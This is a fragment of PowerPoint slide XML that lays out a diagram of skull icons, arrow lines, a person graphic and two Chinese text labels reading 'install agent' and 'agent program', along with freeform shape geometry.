          <a:xfrm>
            <a:off x="5181600" y="2743200"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389135" name="Picture 15" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3962400"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389136" name="Picture 16" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="4724400"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389137" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1371600" y="2743200"/>
            <a:ext cx="2743200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389138" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="3733800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389139" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="2057400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389140" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="2743200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389141" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="3124200"/>
            <a:ext cx="3657600" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389142" name="PPBand277"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1327687">
            <a:off x="2438400" y="2819400"/>
            <a:ext cx="1219200" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>安置代理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389143" name="PPBand278"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2057400"/>
            <a:ext cx="1905000" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>代理程序</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389144" name="Picture 24" descr="pe01696_"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="3124200"/>
            <a:ext cx="1371600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3657600" y="3505200"/>
            <a:ext cx="762000" cy="685800"/>
            <a:chOff x="432" y="2835"/>
            <a:chExt cx="1238" cy="1123"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1053" name="Freeform 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="619" y="2844"/>
              <a:ext cx="132" cy="106"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 397"/>
                <a:gd name="T1" fmla="*/ 0 h 318"/>
                <a:gd name="T2" fmla="*/ 1 w 397"/>
                <a:gd name="T3" fmla="*/ 0 h 318"/>
                <a:gd name="T4" fmla="*/ 0 w 397"/>
                <a:gd name="T5" fmla="*/ 1 h 318"/>
                <a:gd name="T6" fmla="*/ 0 w 397"/>
                <a:gd name="T7" fmla="*/ 1 h 318"/>
                <a:gd name="T8" fmla="*/ 1 w 397"/>
                <a:gd name="T9" fmla="*/ 1 h 318"/>
                <a:gd name="T10" fmla="*/ 1 w 397"/>
                <a:gd name="T11" fmla="*/ 1 h 318"/>
                <a:gd name="T12" fmla="*/ 1 w 397"/>
                <a:gd name="T13" fmla="*/ 1 h 318"/>
                <a:gd name="T14" fmla="*/ 1 w 397"/>
                <a:gd name="T15" fmla="*/ 1 h 318"/>
                <a:gd name="T16" fmla="*/ 0 w 397"/>
                <a:gd name="T17" fmla="*/ 1 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 397"/>
                <a:gd name="T19" fmla="*/ 0 h 318"/>
                <a:gd name="T20" fmla="*/ 1 w 397"/>
                <a:gd name="T21" fmla="*/ 0 h 318"/>
                <a:gd name="T22" fmla="*/ 1 w 397"/>
                <a:gd name="T23" fmla="*/ 0 h 318"/>
                <a:gd name="T24" fmla="*/ 2 w 397"/>
                <a:gd name="T25" fmla="*/ 0 h 318"/>
                <a:gd name="T26" fmla="*/ 1 w 397"/>
                <a:gd name="T27" fmla="*/ 1 h 318"/>
                <a:gd name="T28" fmla="*/ 1 w 397"/>
                <a:gd name="T29" fmla="*/ 0 h 318"/>
                <a:gd name="T30" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1054" name="Freeform 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="679" y="2857"/>
              <a:ext cx="978" cy="374"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2934"/>
                <a:gd name="T1" fmla="*/ 0 h 1122"/>
                <a:gd name="T2" fmla="*/ 0 w 2934"/>
                <a:gd name="T3" fmla="*/ 0 h 1122"/>
                <a:gd name="T4" fmla="*/ 0 w 2934"/>
                <a:gd name="T5" fmla="*/ 1 h 1122"/>
                <a:gd name="T6" fmla="*/ 0 w 2934"/>
                <a:gd name="T7" fmla="*/ 1 h 1122"/>
                <a:gd name="T8" fmla="*/ 1 w 2934"/>
                <a:gd name="T9" fmla="*/ 1 h 1122"/>
                <a:gd name="T10" fmla="*/ 2 w 2934"/>
                <a:gd name="T11" fmla="*/ 1 h 1122"/>
                <a:gd name="T12" fmla="*/ 10 w 2934"/>
                <a:gd name="T13" fmla="*/ 2 h 1122"/>
                <a:gd name="T14" fmla="*/ 10 w 2934"/>
                <a:gd name="T15" fmla="*/ 4 h 1122"/>
                <a:gd name="T16" fmla="*/ 11 w 2934"/>
                <a:gd name="T17" fmla="*/ 4 h 1122"/>
                <a:gd name="T18" fmla="*/ 11 w 2934"/>
                <a:gd name="T19" fmla="*/ 4 h 1122"/>
                <a:gd name="T20" fmla="*/ 11 w 2934"/>
                <a:gd name="T21" fmla="*/ 5 h 1122"/>
                <a:gd name="T22" fmla="*/ 12 w 2934"/>
                <a:gd name="T23" fmla="*/ 4 h 1122"/>
                <a:gd name="T24" fmla="*/ 12 w 2934"/>
                <a:gd name="T25" fmla="*/ 3 h 1122"/>
                <a:gd name="T26" fmla="*/ 12 w 2934"/>
                <a:gd name="T27" fmla="*/ 3 h 1122"/>
                <a:gd name="T28" fmla="*/ 11 w 2934"/>
                <a:gd name="T29" fmla="*/ 3 h 1122"/>
                <a:gd name="T30" fmla="*/ 11 w 2934"/>
                <a:gd name="T31" fmla="*/ 2 h 1122"/>
                <a:gd name="T32" fmla="*/ 10 w 2934"/>
                <a:gd name="T33" fmla="*/ 1 h 1122"/>
                <a:gd name="T34" fmla="*/ 9 w 2934"/>
                <a:gd name="T35" fmla="*/ 0 h 1122"/>
                <a:gd name="T36" fmla="*/ 7 w 2934"/>
                <a:gd name="T37" fmla="*/ 0 h 1122"/>
                <a:gd name="T38" fmla="*/ 5 w 2934"/>
                <a:gd name="T39" fmla="*/ 0 h 1122"/>
                <a:gd name="T40" fmla="*/ 2 w 2934"/>
                <a:gd name="T41" fmla="*/ 0 h 1122"/>
                <a:gd name="T42" fmla="*/ 1 w 2934"/>
                <a:gd name="T43" fmla="*/ 0 h 1122"/>
                <a:gd name="T44" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1055" name="Freeform 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="713" y="2899"/>
              <a:ext cx="911" cy="326"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2734"/>
                <a:gd name="T1" fmla="*/ 1 h 978"/>
                <a:gd name="T2" fmla="*/ 0 w 2734"/>
                <a:gd name="T3" fmla="*/ 0 h 978"/>
                <a:gd name="T4" fmla="*/ 0 w 2734"/>
                <a:gd name="T5" fmla="*/ 0 h 978"/>
                <a:gd name="T6" fmla="*/ 1 w 2734"/>
                <a:gd name="T7" fmla="*/ 0 h 978"/>
                <a:gd name="T8" fmla="*/ 2 w 2734"/>
                <a:gd name="T9" fmla="*/ 0 h 978"/>
                <a:gd name="T10" fmla="*/ 3 w 2734"/>
                <a:gd name="T11" fmla="*/ 0 h 978"/>
                <a:gd name="T12" fmla="*/ 6 w 2734"/>
                <a:gd name="T13" fmla="*/ 0 h 978"/>
                <a:gd name="T14" fmla="*/ 9 w 2734"/>
                <a:gd name="T15" fmla="*/ 1 h 978"/>
                <a:gd name="T16" fmla="*/ 9 w 2734"/>
                <a:gd name="T17" fmla="*/ 1 h 978"/>
                <a:gd name="T18" fmla="*/ 10 w 2734"/>
                <a:gd name="T19" fmla="*/ 2 h 978"/>
                <a:gd name="T20" fmla="*/ 10 w 2734"/>
                <a:gd name="T21" fmla="*/ 1 h 978"/>
                <a:gd name="T22" fmla="*/ 11 w 2734"/>
                <a:gd name="T23" fmla="*/ 2 h 978"/>
                <a:gd name="T24" fmla="*/ 11 w 2734"/>
                <a:gd name="T25" fmla="*/ 3 h 978"/>
                <a:gd name="T26" fmla="*/ 11 w 2734"/>
                <a:gd name="T27" fmla="*/ 3 h 978"/>
                <a:gd name="T28" fmla="*/ 11 w 2734"/>
                <a:gd name="T29" fmla="*/ 3 h 978"/>
                <a:gd name="T30" fmla="*/ 11 w 2734"/>
                <a:gd name="T31" fmla="*/ 3 h 978"/>
                <a:gd name="T32" fmla="*/ 11 w 2734"/>
                <a:gd name="T33" fmla="*/ 3 h 978"/>
                <a:gd name="T34" fmla="*/ 11 w 2734"/>
                <a:gd name="T35" fmla="*/ 4 h 978"/>
                <a:gd name="T36" fmla="*/ 11 w 2734"/>
                <a:gd name="T37" fmla="*/ 4 h 978"/>
                <a:gd name="T38" fmla="*/ 11 w 2734"/>
                <a:gd name="T39" fmla="*/ 3 h 978"/>
                <a:gd name="T40" fmla="*/ 10 w 2734"/>
                <a:gd name="T41" fmla="*/ 4 h 978"/>
                <a:gd name="T42" fmla="*/ 10 w 2734"/>
                <a:gd name="T43" fmla="*/ 4 h 978"/>
                <a:gd name="T44" fmla="*/ 9 w 2734"/>
                <a:gd name="T45" fmla="*/ 2 h 978"/>
                <a:gd name="T46" fmla="*/ 3 w 2734"/>
                <a:gd name="T47" fmla="*/ 1 h 978"/>
                <a:gd name="T48" fmla="*/ 0 w 2734"/>
                <a:gd name="T49" fmla="*/ 1 h 978"/>
                <a:gd name="T50" fmla="*/ 0 w 2734"/>
                <a:gd name="T51" fmla="*/ 1 h 978"/>
                <a:gd name="T52" fmla="*/ 0 w 2734"/>
                <a:gd name="T53" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1056" name="Freeform 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="624" y="2872"/>
              <a:ext cx="110" cy="79"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 332"/>
                <a:gd name="T1" fmla="*/ 0 h 237"/>
                <a:gd name="T2" fmla="*/ 0 w 332"/>
                <a:gd name="T3" fmla="*/ 0 h 237"/>
                <a:gd name="T4" fmla="*/ 0 w 332"/>
                <a:gd name="T5" fmla="*/ 1 h 237"/>
                <a:gd name="T6" fmla="*/ 0 w 332"/>
                <a:gd name="T7" fmla="*/ 1 h 237"/>
                <a:gd name="T8" fmla="*/ 1 w 332"/>
                <a:gd name="T9" fmla="*/ 1 h 237"/>
                <a:gd name="T10" fmla="*/ 1 w 332"/>
                <a:gd name="T11" fmla="*/ 1 h 237"/>
                <a:gd name="T12" fmla="*/ 1 w 332"/>
                <a:gd name="T13" fmla="*/ 0 h 237"/>
                <a:gd name="T14" fmla="*/ 1 w 332"/>
                <a:gd name="T15" fmla="*/ 0 h 237"/>
                <a:gd name="T16" fmla="*/ 1 w 332"/>
                <a:gd name="T17" fmla="*/ 0 h 237"/>
                <a:gd name="T18" fmla="*/ 1 w 332"/>
                <a:gd name="T19" fmla="*/ 0 h 237"/>
                <a:gd name="T20" fmla="*/ 1 w 332"/>
                <a:gd name="T21" fmla="*/ 0 h 237"/>
                <a:gd name="T22" fmla="*/ 1 w 332"/>
                <a:gd name="T23" fmla="*/ 0 h 237"/>
                <a:gd name="T24" fmla="*/ 1 w 332"/>
                <a:gd name="T25" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1057" name="Freeform 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="489" y="2951"/>
              <a:ext cx="1066" cy="996"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 3199"/>
                <a:gd name="T1" fmla="*/ 1 h 2988"/>
                <a:gd name="T2" fmla="*/ 2 w 3199"/>
                <a:gd name="T3" fmla="*/ 0 h 2988"/>
                <a:gd name="T4" fmla="*/ 5 w 3199"/>
                <a:gd name="T5" fmla="*/ 0 h 2988"/>
                <a:gd name="T6" fmla="*/ 9 w 3199"/>
                <a:gd name="T7" fmla="*/ 0 h 2988"/>
                <a:gd name="T8" fmla="*/ 11 w 3199"/>
                <a:gd name="T9" fmla="*/ 0 h 2988"/>
                <a:gd name="T10" fmla="*/ 12 w 3199"/>
                <a:gd name="T11" fmla="*/ 1 h 2988"/>
                <a:gd name="T12" fmla="*/ 12 w 3199"/>
                <a:gd name="T13" fmla="*/ 4 h 2988"/>
                <a:gd name="T14" fmla="*/ 12 w 3199"/>
                <a:gd name="T15" fmla="*/ 5 h 2988"/>
                <a:gd name="T16" fmla="*/ 13 w 3199"/>
                <a:gd name="T17" fmla="*/ 6 h 2988"/>
                <a:gd name="T18" fmla="*/ 12 w 3199"/>
                <a:gd name="T19" fmla="*/ 9 h 2988"/>
                <a:gd name="T20" fmla="*/ 10 w 3199"/>
                <a:gd name="T21" fmla="*/ 9 h 2988"/>
                <a:gd name="T22" fmla="*/ 11 w 3199"/>
                <a:gd name="T23" fmla="*/ 10 h 2988"/>
                <a:gd name="T24" fmla="*/ 13 w 3199"/>
                <a:gd name="T25" fmla="*/ 10 h 2988"/>
                <a:gd name="T26" fmla="*/ 13 w 3199"/>
                <a:gd name="T27" fmla="*/ 12 h 2988"/>
                <a:gd name="T28" fmla="*/ 1 w 3199"/>
                <a:gd name="T29" fmla="*/ 12 h 2988"/>
                <a:gd name="T30" fmla="*/ 0 w 3199"/>
                <a:gd name="T31" fmla="*/ 11 h 2988"/>
                <a:gd name="T32" fmla="*/ 0 w 3199"/>
                <a:gd name="T33" fmla="*/ 11 h 2988"/>
                <a:gd name="T34" fmla="*/ 2 w 3199"/>
                <a:gd name="T35" fmla="*/ 10 h 2988"/>
                <a:gd name="T36" fmla="*/ 4 w 3199"/>
                <a:gd name="T37" fmla="*/ 10 h 2988"/>
                <a:gd name="T38" fmla="*/ 5 w 3199"/>
                <a:gd name="T39" fmla="*/ 9 h 2988"/>
                <a:gd name="T40" fmla="*/ 5 w 3199"/>
                <a:gd name="T41" fmla="*/ 9 h 2988"/>
                <a:gd name="T42" fmla="*/ 3 w 3199"/>
                <a:gd name="T43" fmla="*/ 8 h 2988"/>
                <a:gd name="T44" fmla="*/ 3 w 3199"/>
                <a:gd name="T45" fmla="*/ 5 h 2988"/>
                <a:gd name="T46" fmla="*/ 2 w 3199"/>
                <a:gd name="T47" fmla="*/ 1 h 2988"/>
                <a:gd name="T48" fmla="*/ 2 w 3199"/>
                <a:gd name="T49" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1058" name="Freeform 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="763" y="3008"/>
              <a:ext cx="585" cy="575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1757"/>
                <a:gd name="T1" fmla="*/ 2 h 1724"/>
                <a:gd name="T2" fmla="*/ 1 w 1757"/>
                <a:gd name="T3" fmla="*/ 1 h 1724"/>
                <a:gd name="T4" fmla="*/ 2 w 1757"/>
                <a:gd name="T5" fmla="*/ 0 h 1724"/>
                <a:gd name="T6" fmla="*/ 3 w 1757"/>
                <a:gd name="T7" fmla="*/ 0 h 1724"/>
                <a:gd name="T8" fmla="*/ 4 w 1757"/>
                <a:gd name="T9" fmla="*/ 0 h 1724"/>
                <a:gd name="T10" fmla="*/ 6 w 1757"/>
                <a:gd name="T11" fmla="*/ 0 h 1724"/>
                <a:gd name="T12" fmla="*/ 6 w 1757"/>
                <a:gd name="T13" fmla="*/ 1 h 1724"/>
                <a:gd name="T14" fmla="*/ 7 w 1757"/>
                <a:gd name="T15" fmla="*/ 1 h 1724"/>
                <a:gd name="T16" fmla="*/ 7 w 1757"/>
                <a:gd name="T17" fmla="*/ 2 h 1724"/>
                <a:gd name="T18" fmla="*/ 7 w 1757"/>
                <a:gd name="T19" fmla="*/ 4 h 1724"/>
                <a:gd name="T20" fmla="*/ 7 w 1757"/>
                <a:gd name="T21" fmla="*/ 5 h 1724"/>
                <a:gd name="T22" fmla="*/ 6 w 1757"/>
                <a:gd name="T23" fmla="*/ 6 h 1724"/>
                <a:gd name="T24" fmla="*/ 6 w 1757"/>
                <a:gd name="T25" fmla="*/ 7 h 1724"/>
                <a:gd name="T26" fmla="*/ 5 w 1757"/>
                <a:gd name="T27" fmla="*/ 7 h 1724"/>
                <a:gd name="T28" fmla="*/ 3 w 1757"/>
                <a:gd name="T29" fmla="*/ 7 h 1724"/>
                <a:gd name="T30" fmla="*/ 1 w 1757"/>
                <a:gd name="T31" fmla="*/ 7 h 1724"/>
                <a:gd name="T32" fmla="*/ 0 w 1757"/>
                <a:gd name="T33" fmla="*/ 6 h 1724"/>
                <a:gd name="T34" fmla="*/ 0 w 1757"/>
                <a:gd name="T35" fmla="*/ 5 h 1724"/>
                <a:gd name="T36" fmla="*/ 0 w 1757"/>
                <a:gd name="T37" fmla="*/ 3 h 1724"/>
                <a:gd name="T38" fmla="*/ 0 w 1757"/>
                <a:gd name="T39" fmla="*/ 3 h 1724"/>
                <a:gd name="T40" fmla="*/ 0 w 1757"/>
                <a:gd name="T41" fmla="*/ 2 h 1724"/>
                <a:gd name="T42" fmla="*/ 0 w 1757"/>
                <a:gd name="T43" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1059" name="Freeform 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="438" y="3229"/>
              <a:ext cx="462" cy="251"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1386"/>
                <a:gd name="T1" fmla="*/ 1 h 753"/>
                <a:gd name="T2" fmla="*/ 0 w 1386"/>
                <a:gd name="T3" fmla="*/ 0 h 753"/>
                <a:gd name="T4" fmla="*/ 1 w 1386"/>
                <a:gd name="T5" fmla="*/ 0 h 753"/>
                <a:gd name="T6" fmla="*/ 1 w 1386"/>
                <a:gd name="T7" fmla="*/ 0 h 753"/>
                <a:gd name="T8" fmla="*/ 2 w 1386"/>
                <a:gd name="T9" fmla="*/ 0 h 753"/>
                <a:gd name="T10" fmla="*/ 2 w 1386"/>
                <a:gd name="T11" fmla="*/ 0 h 753"/>
                <a:gd name="T12" fmla="*/ 2 w 1386"/>
                <a:gd name="T13" fmla="*/ 1 h 753"/>
